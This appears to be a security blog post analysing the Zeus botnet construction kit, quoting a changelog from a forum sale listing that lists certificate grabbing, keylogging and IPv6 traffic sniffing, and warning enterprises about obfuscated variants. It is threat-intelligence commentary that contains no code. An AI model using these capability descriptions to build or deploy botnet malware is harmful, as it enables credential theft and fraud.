When you’re building your very own botnet you need to be quite selective about the botnet agent you’re planning on running with. Many of the botnets we encounter operating within enterprise environments today are constructed using commonly available DIY malware construction kits – of which Zeus is the most popular.
Zeus is an interesting DIY malware construction kit. Over the years it has added to its versatility and developed in to an open platform for third-party tool integration – depending upon the type of fraud or cybercrime the botnet master is most interested in. Along the way, many malware developers have tweaked the Zeus kit and offer specialized (and competing) major versions of the DIY suite (for sale). As such, the “Zeus” kit has morphed and isn’t really even a single kit any more. You can find Zeus construction kits retailing between $400-$700 for the latest versions – dropping to “free” within a couple of months as pirated versions start circulating Torrent feeds.
That said, competition between Zeus vendors is fierce – driving new innovation within within this single DIY construction kit.
Take for example the recently posted “for sale” instruction for a new Zeus version over on one of the popular hacking forums – retailing for $700 new…
It’s interesting to note the major changes in the DIY kits changelog –
[Version 1.3.0.0, 20.11.2009]
[*] Interception WinApi by splicing.
[+] Be fully operational in Windows Vista / 7.
[*] Temporarily disable hidden files Trojan.
[*] Removed TAN-grabber.
[-] Fixed duplicate records in nspr4.dll.
[*] Grabbed certificates are now written with the name grabbed_dd_mm_yyy.pfx, and password in UTF-8.
[*] Team getcerts, obtained certificates only from MY-store, and not from all. Since obtaining certificates from all hranilish not make sense.
[*] Changed behavior grabber certificates.
[*] Rewrote FTP/POP3 sniffer, ulucheshno detection logins, made support for IPv6-addresses.
[*] Rewrote the interception of keyboard input, fixed method of working with international characters to.
[-] Corrected a bug in HTTP-fakie, which could lead to deadlock.
I think the most interesting advances are those I’ve bolded above.
Obviously Windows 7 support is going to be pretty import going forward for Zeus-dependent botnet masters, so too is the gabbing of certificates from the victims systems (e.g. SSL/TLS client certificates and corporate VPN access). The fact that the TAN-grabber has been removed is probably more indicative of features no longer required by Zeus “customers” and an effort to keep the Zeus botnet agent down in size.
The most significant addition with this release in my mind is the additional support for IPv6 – particularly as it relates to network sniffing. As enterprise networks (and government networks) take up IPv6 internally, botnet operators need to ensure that they’re also “IPv6 compliant” (which is easy enough if the victim’s operating system is configured to rely upon IPv6), but more critical is the capability to sniff IPv6 network traffic and automatically extract the data most valuable to the botnet operator – rather than having to deal with bulk packet captures.
For those enterprise networks already running IPv6 it’s important that their network administrators and security teams know that botnet masters are already armed with IPv6 capabilities – and are constantly tweaking and enhancing botnet agent capabilities.
One last thing to note though. Just because Zeus is a common botnet malware family, it doesn’t mean that you’re likely to have antivirus detection coverage within typical enterprise networks. Zeus is practically never deployed in its “raw” state – instead, botnet masters typically deploy heavily obfuscated and protected serial variants of the malware – making each victim unique. So don’t be surprised if it evades any host-based detection technologies you may have deployed.
